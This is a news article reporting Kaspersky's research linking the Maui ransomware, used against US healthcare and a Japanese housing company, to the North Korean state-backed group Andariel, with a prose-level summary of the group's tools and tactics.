Maui ransomware linked to North Korean group Andariel

The Maui ransomware that has been used against US healthcare operations has been linked to Andariel, a North Korean state-sponsored threat with links to the notorious Lazarus Group.

Researchers at Kaspersky said this week they were able to trace the origins of Maui to April 2021 – a month earlier than the strain had earlier been reported. An examination of data logs also showed some interesting information as to how the attack was deployed in advance.

About 10 hours before the April Maui attack, the criminals inserted a variant of the DTrack malware to the target. Kaspersky also noted the presence of the 3Proxy tool – used for accessing internal resources – for several months prior to the ransomware deployment on an unnamed Japanese housing company.

"This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly," the researchers wrote in a report.

Andariel has been active since 2015, running attacks to steal data and bring in revenue for the North Korean regime. The group's targets have been primarily in South Korea and other Asian countries, as well as the lucrative American market.

Last month, the US State Department included Andariel in a list of North Korean state-sponsored threat groups – including Lazarus as well as BlueNoroff, Guardians of Peace, and Kimsuky – that the agency is targeting with a $10 million reward for information about the gangs and their operators. The State Department said these groups are targeting critical infrastructure within the homeland.

Kaspersky researchers, pointing to build timestamps, suggested that the attack on the Japanese organization as probably the first involving the Maui ransomware, which has garnered a lot of attention over the past year. The US Cybersecurity and Infrastructure Security Agency (CISA) and FBI in early July issued a warning about Maui, noting its connection to North Korean threat groups and its targeting of US healthcare organizations.

• Iran cheerfully admits using cryptocurrency to pay for imports
• US puts $10 million bounty on North Korean cyber-crews
• North Koreans spotted harassing SMBs with malware
• Here today, gone to Maui: That's your data captured by North Korean ransomware

That month the Department of Justice and FBI also said it was able to claw back about $500,000 that healthcare facilities had paid in ransom during Maui attacks, recovering the money by tracing it through the blockchain and identifying accounts used to launder the digicash in China.

While CISA noted in its alert last month that the healthcare and public health sectors were the primary targets of Maui in the US, the Kaspersky analysts say they don't believe that the operation goes after specific industries as a pattern, and that its reach extends well beyond the US and Asiat.

"Our research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing," they wrote. "It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the Andariel deployed ransomware selectively to make financial profits."

Kaspersky researchers said they linked Andariel to Maui through the use of the DTrack malware in the Japan incident and noted that the same DTrack variant was used in other attacks in Russia, Vietnam, and India during the same timeframe.

"The primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data," they wrote.

The Maui attack on the Japanese housing organization was "remarkably similar" to past operations by Andariel, according to the researchers. Attack vectors included using a legitimate proxy and tunneling tools either after the initial infection or using them to maintain access, as well as using PowerShell scripts and Bitsadmin to download additional malware.

Other similarities included using exploits to target known and unpatched vulnerable public services, including WebLogic and HFS, exclusively deploying DTrack, dwelling in targeted networks for months, and deploying ransomware on a global scale. ®